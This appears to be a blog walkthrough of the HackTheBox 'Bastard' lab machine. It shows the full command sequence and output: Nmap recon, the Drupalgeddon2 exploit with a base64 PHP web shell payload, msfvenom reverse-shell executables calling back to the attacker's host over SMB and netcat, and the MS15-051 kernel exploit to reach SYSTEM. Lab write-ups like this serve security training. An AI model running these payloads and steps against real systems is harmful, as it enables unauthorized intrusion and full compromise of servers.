HackTheBox: Bastard

My first step was to perform an Nmap scan against the machine:

# Nmap 7.91 scan initiated Fri Dec 18 14:03:28 2020 as: nmap -sV -sC -p- -oN scan -O 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.029s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 18 14:08:24 2020 -- 1 IP address (1 host up) scanned in 296.09 seconds

We can see from the output that there are a number of ports open. HTTP on port 80 running Drupal, Also 135 and 49154 running MSRPC.  I decided to start with port 80 as this is the one I’m most familiar with.

By browsing to http://10.10.10.9/CHANGELOG.txt you can see that it is running drupal version 7.54. I used searchsploit to identify vulnerabilities in this version of Drupal.

┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# searchsploit drupal 7            
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting                                                                                                                                                                    | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                                                                                                            | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                                                                                                              | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                                                                                                            | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                                                                                                                  | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                                                                                                                   | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                                                                                                        | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                                                                                                         | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                                                                                                              | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                                                                                                              | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                                                                                                                 | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                                                                                                                   | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                                                                                                       | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                                                                                                                  | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                                                                                                                    | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                                                                                                            | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                                                                                                        | php/dos/35415.txt
Drupal < 7.34 - Denial of Service                                                                                                                                                                        | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                 | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                              | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                      | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                      | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                  | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                  | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                         | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                    | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                           | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                       | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                                                        | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                                                   | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                                                                                                          | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                                                            | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                                                                                                                  | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                                                                                                           | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities                                                                                             | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                                                        | php/remote/40130.rb
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

After some trial and error I discovered that the “Drupalgeddon2” exploit 44449.rb was successfull.

┌──(root💀kali)-[/home/kali/Documents/bastard]
└─# ruby 44449 http://10.10.10.9                                                                                                                                                                                                       2 ⚙
ruby: warning: shebang line ending with \r may cause problems
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo YVSJVABF
[+] Result : YVSJVABF
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>> 

You can see from the output that a shell was spawned and I was logged in as the user isur. This shell however wasnt persistent. So I generated a reverse shell in msfvenom:

┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse.exe                                                                                                                                        1 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

I then started an SMB server on the kali machine to host the reverse.exe reverse shell I just created:

──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/

I then started a netcat listener on the kali machine port port 2600 to capture the reverse shell.

┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600                                                                                                                                                                                                                  1 ⨯ 1 ⚙
listening on [any] 2600 ...

The reverse shell was then downloaded to the Bastard machine using the drupalgeddon2 shell and executed.

drupalgeddon2>> copy \\10.10.14.19\testshare\reverse.exe
1 file(s) copied.
drupalgeddon2>> reverse.exe

From the output below, you can see that the shell was successfully captured in netcat, and the user flag was captured.

┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600                                                                                                                                                                                                                  1 ⨯ 1 ⚙
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49739
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>cd /users
cd /users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35 ��    <DIR>          .
19/03/2017  07:35 ��    <DIR>          ..
19/03/2017  01:20 ��    <DIR>          Administrator
19/03/2017  01:54 ��    <DIR>          Classic .NET AppPool
19/03/2017  07:35 ��    <DIR>          dimitris
14/07/2009  06:57 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  30.807.498.752 bytes free

C:\Users>cd dimitris
cd dimitris

C:\Users\dimitris>cd Desktop
cd Desktop

C:\Users\dimitris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\dimitris\Desktop

19/03/2017  08:04 ��    <DIR>          .
19/03/2017  08:04 ��    <DIR>          ..
19/03/2017  08:06 ��                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.498.752 bytes free

C:\Users\dimitris\Desktop>type user.txt
type user.txt
[REDACTED]

The next step was to esclate privilages. I ran systeminfo and discovered that it was an unpatched Server 2008 machine.

C:\Users\dimitris\Desktop>systeminfo
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          27/12/2020, 3:37:18 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.536 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.530 MB
Virtual Memory: In Use:    565 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Because of this, there are multiple kernel exploits that should be successful in escalating privilages. I decided to try MS15-015 as I had had some luck with this exploit in the past. I downloaded the ZIP file from the github page, extracted the 64bit exe and copied it into /var/www so it can be transfered to the Bastard machine.

┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# unzip MS15-051-KB3045171.zip 
Archive:  MS15-051-KB3045171.zip
   creating: MS15-051-KB3045171/
  inflating: MS15-051-KB3045171/ms15-051.exe  
  inflating: MS15-051-KB3045171/ms15-051x64.exe  
   creating: MS15-051-KB3045171/Source/
   creating: MS15-051-KB3045171/Source/ms15-051/
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp  
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj  
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters  
  inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user  
  inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib  
  inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib  
  inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt  
   creating: MS15-051-KB3045171/Source/ms15-051/Win32/
  inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe  
   creating: MS15-051-KB3045171/Source/ms15-051/x64/
  inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe  
  inflating: MS15-051-KB3045171/Source/ms15-051.sln  
  inflating: MS15-051-KB3045171/Source/ms15-051.suo  
                                                                                                                                                                                                                                           
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# ls
MS15-051-KB3045171  MS15-051-KB3045171.zip
                                                                                                                                                                                                                                           
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# cd MS15-051-KB3045171 
                                                                                                                                                                                                                                           
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# ls
ms15-051.exe  ms15-051x64.exe  Source
                                                                                                                                                                                                                                           
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# cp ms15-051x64.exe /var/www 

When this exe is run, it takes the command you want to execute as the argument. So I decided to create another reverse shell going to port 2602 on the Kali machine. This is what I execute as the argument of the MS15-051 exploit. I essentially get a SYSTEM privilage reverse shell. I created the reverse shell:

┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2602 -f exe > reverse2602.exe                                                                                                                                        1 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Then on the Bastard machine copied both the reverse shell and the MS15-051 exploit to the machine.

C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\ms15-051x64.exe
copy \\10.10.14.19\testshare\ms15-051x64.exe
        1 file(s) copied.

C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\reverse2602.exe
copy \\10.10.14.19\testshare\reverse2602.exe
        1 file(s) copied.

A new netcat listener was then started on the kali machine listening on port 2602 to capture the new reverse shell.

┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602                                                                                                                                                                                                                      
listening on [any] 2602 ...

The exploit was then run:

C:\inetpub\drupal-7.54>ms15-051-x64.exe "reverse2602.exe"
ms15-051-x64.exe "reverse2602.exe"
'ms15-051-x64.exe' is not recognized as an internal or external command,
operable program or batch file.

C:\inetpub\drupal-7.54>ms15-051x64.exe "reverse2602.exe"
ms15-051x64.exe "reverse2602.exe"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 624 created.
==============================

You can see from the output berlow, the reverse system shell was successfully captured and was able to capture the root flag.

┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602                                                                                                                                                                                                                      
listening on [any] 2602 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49681
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>cd /
cd /

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users

19/03/2017  07:35 ��    <DIR>          .
19/03/2017  07:35 ��    <DIR>          ..
19/03/2017  01:20 ��    <DIR>          Administrator
19/03/2017  01:54 ��    <DIR>          Classic .NET AppPool
19/03/2017  07:35 ��    <DIR>          dimitris
14/07/2009  06:57 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  30.807.498.752 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator

19/03/2017  01:20 ��    <DIR>          .
19/03/2017  01:20 ��    <DIR>          ..
19/03/2017  01:20 ��    <DIR>          Contacts
19/03/2017  07:33 ��    <DIR>          Desktop
19/03/2017  02:09 ��    <DIR>          Documents
19/03/2017  12:42 ��    <DIR>          Downloads
19/03/2017  01:20 ��    <DIR>          Favorites
19/03/2017  01:20 ��    <DIR>          Links
19/03/2017  01:20 ��    <DIR>          Music
19/03/2017  01:20 ��    <DIR>          Pictures
19/03/2017  01:20 ��    <DIR>          Saved Games
19/03/2017  01:20 ��    <DIR>          Searches
19/03/2017  01:20 ��    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  30.807.498.752 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\Users\Administrator\Desktop

19/03/2017  07:33 ��    <DIR>          .
19/03/2017  07:33 ��    <DIR>          ..
19/03/2017  07:34 ��                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.498.752 bytes free

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
[REDACTED]

 

Leave a Reply

Your email address will not be published. Required fields are marked *